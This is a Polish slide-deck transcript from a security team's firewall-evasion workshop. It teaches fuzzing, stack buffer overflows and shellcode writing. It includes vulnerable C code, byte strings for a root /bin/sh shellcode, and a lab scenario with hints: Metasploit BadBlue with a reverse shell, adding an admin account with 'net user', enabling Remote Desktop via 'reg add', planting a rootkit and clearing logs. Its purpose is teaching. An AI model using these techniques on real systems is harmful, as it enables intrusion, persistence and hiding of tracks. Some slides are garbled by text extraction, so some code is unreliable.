Transkrypt

1 Omijanie firewalli w systemach Windows ---warsztaty --- Mateusz Drygas, Marcin Jerzak, Jakub Tomaszewski, Zespół Bezpieczeństwa PCSS Poznań,

2 Agenda 10:00 Rozpoczęcie, powitanie uczestników, informacje organizacyjne 10:05 Poznajmy się: czym jest PCSS, Zespół Bezpieczeństwa PCSS i MIC? 10:05 Trochę informacji technicznych 10:15 Łamanie zabezpieczeń w praktyce 11:30 Przerwa 11:45 Lokalnie i zdalnie... 12:00 Firewalle - ćwiczenia w formie scenariusza 13:30 Na zakończenie garść przydatnej wiedzy i dyskusja 2

3 Informacje organizacyjne Ankieta Krótka i anonimowa Pomoc na przyszłość Lista obecności Proszę zaznaczyć, czy chcecie Państwo otrzymywać informacje o kolejnych szkoleniach Prezentacja dostępna na stronach WWW

4 Kim jesteśmy i co robimy? 4

5 PCSS Poznańskie Centrum Superkomputerowo-Sieciowe: Sieciowe: 15 lat w październiku 2008 Operator sieci PIONIER (sieć dla edukacji i nauki) oraz POZMAN Uczestnik projektów naukowo- badawczych Główne obszary zainteresowań Gridy, sieci nowej generacji, portale Bezpieczeństwo sieci i systemów 5

6 Zespół Bezpieczeństwa PCSS Dedykowany zespół istnieje od 1996r. Podstawowy zakres prac Zespołu Zabezpieczanie infrastruktury PCSS Zadania bezpieczeństwa w projektach naukowo badawczych Szkolenia i transfer wiedzy Badania własne Audyty i doradztwo w zakresie bezpieczeństwa IT Niektóre badania z ostatnich lat Raport o bezpieczeństwie bankowości elektronicznej (2006) Bezpieczeństwo serwerów WWW Apache i MS IIS (2007) Bezpieczeństwo sklepów internetowych (2008) 6

7 Centrum Innowacji Microsoft Pierwsze w Polsce MIC Centrum Bezpieczeństwa i usług outsourcingowych Partnerzy Microsoft Corporation Poznańskie Centrum Superkomputerowo-Sieciowe Sieciowe Politechnika Poznańska Otwarcie: r. 7

8 Wybrane zadania MIC w 2009 Nowe obszary badań (od I 2009): Interoperacyjność systemów i technologii Wirtualizacja systemów Wysokowydajne przetwarzanie komputerowe (HPC) m.in. udział w programie HPC TAP Doroczna Konferencja MIC - 16 kwietnia 2009, 3. edycja 8

9 Szkolenia MIC I półrocze 2009 Interoperacyjność 27.05: Zastosowanie technologii Silverlight : Windows Server 2008 jako uniwersalna platforma zapewniająca usługi wirtualizacji i klastrowania 23.06: Bezpieczeństwo heterogenicznej platformy hostingowej(są jeszcze ostatnie wolne miejsca) Bezpieczeństwo 18.06: Omijanie firewalli w systemach Windows warsztaty BYOL dla specjalistów bezpieczeństwa 9

10 Szkolenia MIC II półrocze 2009 Interoperacyjność Windows HPC Server Exchange Labs jako uniwersalna platforma Bezpieczeństwo Bezpieczeństwo aplikacji ASP.NET MVC Bezpieczeństwo kontrolera domeny Szkolenia w Warszawie: IX/X 2009 (powtórzenie cyklu Interoperacyjność ) Zachęcamy do zgłaszania w ankietachpropozycji tematów na kolejne spotkania! 10

11 Informacje techniczne (1) System Linux Live + changes User: root / Passwd: toor Wifi - pcss-warsztaty wpa_passphrase pcss-warsztaty warsztaty-firewalle > wpa.conf wpa_supplicant -i<interface wifi> -cwpa.conf 11

12 Informacje techniczne (2) Adresacja Brama DNS Serwer do ćwiczeń Adres kliencki: XX ifconfig <interface wifi> XX netmask ip route add default via

13 Architektura środowiska System Centralny XP_V1 XP_V2 XP_V3 XP_Vn... Wifi L1 L2 L3 Ln... 13

14 Łamanie zabezpieczeń wpraktyce Wyszukiwanie podatności Eksploitacja błędów Shellcoding

15 Wyszukiwanie podatności 15

16 Ręczne wyszukiwanie błędów Wartości niezgodne ze specyfikacją poza zakresem inne dane niż oczekiwane (float/string) znaki specjalne losowe

17 Automatyczne szukanie luk Fuzzer Stosunkowo łatwo napisać prosty fuzzer Fuzzing bardziej złożony rozbudowane dane wejściowe (np. jpeg) obsługa debuggera analiza wyników i dostosowywanie testowanych danych

18 Rodzaje fuzzerów Mutacyjne Generacyjne Ewolucyjne

19 Wady fuzzingu Nie znajduje błędów logicznych Nieokreślony czas znalezienia podatności Wraz zewzrostemskomplikowaniaprogramupostępuje wzrost złożoności fuzzer'a

20 Jak napisać prosty fuzzer (1) Analiza programu: na jakich danych operuje? skąd je bierze? Modyfikacja danych wejściowych różne znaki w parametrach różne długości parametrów modyfikacja przetwarzanych plików modyfikacje paczek sieciowych Najlepszewynikiosiągamy, gdymamydostępdo maszyny, na której znajduje się testowana aplikacja i jeżeli testujemy program w debugerze(olydbg, gdb), który pomoże w analizie błędu

21 Jak napisać prosty fuzzer (2) Po ustaleniu,co można zaatakować,czasemwystarczy... krótki skrypt w bash'u: #!/bin/bash #very simple fuzz x=1 C='i' licz=1 while [ $x -le 10 ]; do a=`./hello $C` wyn=$? if [ $wyn = 139 ] then echo "SEGV dla ilosci:"$licz exit fi C=$C'i' licz=$((licz+1)) done

22 Przykładowe znane fuzzery -Linux clfuzz.py napisanywpythonie fuzzer oparty o linię komend. Bardzo przydatny do testowania binariów setuidna błędy przepełnienia w linii komend zzuf działa w oparciu o mechanizm przechwytywania przerwań operacji plikowych i podmiany losowych bitów SPIKE to napisany w C kod, który jest bazą do tworzenia fuzzerów. Prawdopodobnie najszerzej wykorzystywany framework tego typu Peach SmartFuzzer zdolny wykorzystywać zalety fuzzerów generacyjnych i mutacyjnych

23 Przykładowe znane fuzzery -Windows AxMan webowy fuzzer oparty o mechanizmy ActiveX,napisany przez H.D. Moore a. Peach SmartFuzzer,zdolny wykorzystywać zalety fuzzerów generacyjnych I mutacyjnych

24 Bardziej złożone fuzzery W Pythonie dla Linux'a: W C++ dla Windowsa:

25 Ciekawostka Mozilla udostępnilaw 2007r JSfuzzer, którymtestowała Firefoksa. Dzięki temuznalezionozajegopomocą280 błędów, z czego27 można było wyeksploitować fuzzer-at-blackhat-.html

26 Exploitation 0x

27 Pierwszy kod #include <unistd.h> char arg[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA"; int main(int argc, char **argv) { } execl("./crackme", "./crackme", arg, NULL); return 0;

28 Stos Last In First Out Rośnie w dół Wątki posiadają odrębne stosy Operacje PUSH i POP

29 Rejestry i adresy ESP wskaźnik szczytu stosu, EIP wskaźnik instrukcji, EBP rejestr bazowy, EBP + 4 = RET RET adres powrotu,

30 0x (gdb) f 3 #3 0x in?? () (gdb) i reg eax 0x0 0 ecx 0xffffffff -1 edx 0x280e8c4c ebx 0x3 3 esp 0xbfbfec48 0xbfbfec48 ebp 0x x esi 0xbfbff7ac edi 0xbfbff7bc eip 0x x eflags 0x cs 0x1f 31 ss 0x2f 47 ds 0x2f 47 es 0x2f 47 fs 0x2f 47 gs 0x2f 47

31 Rejestry General Purpose EAX, EBX, ECX Segment Pointers CS, DS Control EIP

32 RET -adres powrotu Gdzie jest nasz shellcode? export shellcode $(perl -e 'print A x100) Gdzie jest stos? echo 0 > /proc/sys/kernel/randomize_va_space Jak trafić? x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x 90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90

33 Podatny kod #include <stdlib.h> #include <stdio.h> #include <string.h> int bof(char *string) { char buffer[1024]; strcpy(buffer, string); return 1; } int main(int argc, char *argv[]) { bof(argv[1]); return 1; }

34 Ochrona pamięci Stack cookies Address Space Layout Randomization SafeSEH Heap Protection Data Execution Prevention

35 Separacja w Windows User mode ring 3 Kernel mode ring 0

36 Stałe błędy programistyczne (1) Stack Overflow np. nadpisujemy adres powrotu adresem, który znajduje się w ring 3

37 Stałe błędy programistyczne (2) Niedostateczna walidacja adresów pochodzących z user-mode np. nadpisujemy wskaźnik do danej funkcji ring 0 adresem wskazującym na ring 3

38 Stałe błędy programistyczne (3) Non-executable stack DEP Return to libc przekierowanie sterowania do funkcji,a na stosie znajdują się parametry system() - uruchamia proces

39 Shellcoding 39

40 Definicja kod maszynowy możliwy do wykonania bezpośrednio przez procesor, wykonujący zawsze DOKŁADNIE to, co chcemy brak statycznych odwołań Pomijamy,jeśli tylko sięda,znak -> NULL xor X X

41 Narzędzia gcc -kompilator, as - assembler, ld -linker, gdb - debuger, objdump (-x, -d, -D) > disassembler+ strace vi i inne

42 Wrapper kodu assemblera (test.c) char shellcode[] = ""; //nasz shellcode w tablicy globalnej int main (int argc, char **argv) { int (*ret)(); //wskaznik funkcji ret = (int(*)())shellcode; //wskazujemy nasz shellcode } (int)(*ret)(); return 0; //wywolanie jak funkcji

43 Budowanie shellcode'u krok po kroku 1. Co ma robić shellcode? 2. Definicja funkcji przez niego używanych, 3. Wywołania systemowe potrzebnych funkcji, 4. Budowa kodu assemblera, 5.Kompilacja do binarki, 6. Deassemblacja, 7. Budowanie shellcodu, 8. Test.

44 Przyklad (1) exit(0) Funkcja exit() Definicja -> man 2 exit void _exit(int status);

45 Przyklad (1) exit(0) syscall grep NR_exit /usr/include/asm/unistd_32.h #define NR_exit 1 grep NR_exit /usr/include/asm/unistd.h grep NR_exit /usr/include/asm/unistd_64.h

46 Przyklad (1) exit(0) As exit.s -o exit.o ld exit.o -o exit./exit echo $? objdump -d exit shellcode: \x31\xc0\xb0\x01\x31\xdb\xcd\x80 kilka testów (test_exit.c)

47 Przyklad (2) Hello World Funkcje exit() i write() Definicja -> man 2 exit void _exit(int status); Definicja -> man 2 write ssize_t write(int fd, const void *buf, size_t count);

48 Przyklad (2) Hello World syscall grep NR_exit /usr/include/asm/unistd_32.h #define NR_exit 1 grep NR_write /usr/include/asm/unistd_32.h #define NR_write 4

49 Przyklad (2) Hello World Własności i ich konsekwencje brak NULL i statycznych odwołań call call wrzuca następującą po niej wartość(standardowo adres powrotu) na stos i przenosi kontrolędo miejsca, ktorejest jej parametrem.

50 Przyklad (2) Hello World as hello.s -o hello.o ld hello.o -o hello./hello objdump -d hello shellcode: "\xeb\x19\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04"\ "\xb2\x0e\x59\xb3\x01\xcd\x80\x31\xc0\xb0\x01\x31"\ "\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x48\x65\x6c\x6c"\ "\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21\x0a" test (test_hello.c)

51 Przyklad (2) Hello World Uwaga: H e l l o, W o r l d! \n c 6c 6f 2c f 72 6c a czyli: \x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21\x0a

52 Przyklad (3) /bin/sh + root Funkcje setreuid() i execve() Definicja -> man 2 setreuid int setreuid(uid_t ruid, uid_t euid); Definicja -> man 2 execve int execve(const char *filename, char *const argv[], char *const envp[]);

53 Przyklad (3) /bin/sh + root syscall grep NR_setreuid /usr/include/asm/unistd_32.h #define NR_setreuid 70 grep NR_execve /usr/include/asm/unistd_32.h #define NR_execve 11

54 Przyklad (3) /bin/sh + root execve("/bin/sh", *"/bin/sh", (char **)NULL); execve("/bin/sh", - ciąg do wywołania (bez NULLi!) *"/bin/sh", -adres tego ciągu (char**)null) -NULL-owy wskaźnik do przyległej pamięci (parametry wywołania /bin/sh) ciąg w pamięci wygląda tak: /bin/shnxxxxyyyy gdzie N ma wartośćdokładnie \0 (koniec ciągu), czyli dla nas zakazaną nie możemy mu nadać wartości NULL, ale możemy go XOR-ować XXXX (4 bajty) to adres adresu naszego ciągu YYYY (4 bajty) to adres wskaźnika envp[] (aktualnie call *NULL)

55 Przyklad (3) /bin/sh + root As shell.s -o shell.o ld shell.o -o shell./shell (?) shellcode: (?)

56 Przyklad (3) /bin/sh + root Segmentation fault!!! Dlaczego??

57 Przyklad (3) /bin/sh + root as -g shell.s -o shell.o (przydaje się, ale nie jest konieczne) ld shell.o -o shell objdump -x shell.text ma atrybut readonly :/ ale.data :D

58 Przyklad (3) /bin/sh + root as shell_new.s -o shell_new.o ld shell_new.o -o shell_new./shell_new objdump -d shell_new "\x31\xc0\xb0\x46\x31\xc9\x31\xdb\xcd\x80\xeb\x18\x5b"\ "\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x31\xc0"\ "\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe3\xff"\ "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" test (test_shell_new.c)

59 Co dalej? minimalizacja długości shellcody bez konkretnych znaków shellcody tylko ze znaków drukowalnych

60 Przerwa 60

61 Lokalnie i zdalnie...

62 Szukanie błędów Większy problem ze zdefiniowaniem faktu błędu Niejednoznacze odpowiedzi od serwera Utrudnione debugowanie

63 Exploitowanie Znaczące problemy z uzyskaniem danych o procesach (rejestrach) oraz stanie usługi Brak znajomości środowiska docelowego

64 Shellcoding Wymagana jest dokładna znajomość systemu zdalnego Przy założeniu dokładnie tych samych funkcjonalności shellcodu złożoność problemu jest w przybliżeniu identyczna

65 Firewalle -ćwiczenia wformie scenariusza

66 Wprowadzenie Wiedza początkowa agresora: Cel znajduje się pod adresem , Cel wykorzystuje system Windows, Cel jest chroniony przez co najmniej jeden firewall

67 Rozpoznanie maszyny Skan adresu

68 Podpowiedź (!) Poszukiwany otwarty port: 133XX

69 Rozpoznanie reakcji na porcie Skanowanie Próby połączeń Testy reakcji na pakiety

70 Fuzzing na rozpoznany port Zadanie: Napisać (odszukać, przystosować) fuzzera i zaatakować port

71 Podpowiedź (!)

72 Reakcja usługi na danym procie Analiza wykonanych czynności ireakcji serwera

73 Ponowne rozpoznanie portów Skanowanie

74 Podpowiedź (!) Poszukiwany otwarty port: 144XX

75 Ponowne rozpoznanie usługi rozpoznanie atak explitowanie przez znane luki

76 Podpowiedź (!) Metasploit BadBlue windows/shell/reverse_tcp

77 Dalsze działanie (1) Dodanie konta z prawami administratora

78 Podpowiedź (!) net user janek janka /add net localgroup net localgroup Administratorzy janek /add

79 Dalsze działanie (2) Otwieramy dostęp przy pomocy: Windows XPRemote Desktop

80 Podpowiedź (!) Weryfikacja ustawień: reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fdenytsconnections Zmiana ustawień: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /vfdenytsconnections /t REG_DWORD /d 0x0

81 Dalsze działania + czyszczenie (1) Komunikat firewalla usunięcie (?) Umieszczenie programu typu rootkit Ponowne uruchomienie usługi firewalla (Kerio Ponowne uruchomienie usługi firewalla (Kerio Personall Firewall)

82 Dalsze działania + czyszczenie (2) Czyszczenie logów systemowych Usunięcie dodanego konta Wyłączenie Remote Desktop

83 Założenie (!) Atak przeprowadzamy z sieci lokalnej, ale Internet jest udostępniony przez inny interfejs, na którym dostępny dla TCP jest jedynie port docelowy 80-ty (dodatkowy system firewall dla styku sieci lokalnej i Internetu)

84 Rootkit -> Podpowiedź (!) WinAPI DllInjection lub IP over DNS

85 Schemat wyjścia rootkita Proces aplikacji - hosta FW Wątek podczepiany

86 Na zakończenie garść przydatnej wiedzy idyskusja

87 Shellcody, rootkity, exploity gdzie ich szukać? INTERNET!!!!...czego dowodzą dzisiejsze warsztaty!

88 Ciekawostka analiza exploita Kerio Personal Firewall v2.1.4 remote code execution exploit

89 Analiza DllInjection schemat (1) NIE Start Znaleziono hosta? TAK Wstrzyknij kod

90 Zabezpieczenia!? Aktualizacja, aktualizacja, aktualizacja (!) Godny polecenia producent oprogramowania Dbanie o czystość własnego systemu Świadome użytkowanie komputera

91 Dlaczego nacisk na atak, a nie na obronę???? Dyskusja! 91

92 Informacje kontaktowe Autorzy prezentacji Centrum Innowacji Microsoft PCSS Zespół Bezpieczeństwa PCSS 92

93 Pytania i dyskusja, propozycje? Dziękujemy za uwagę! 93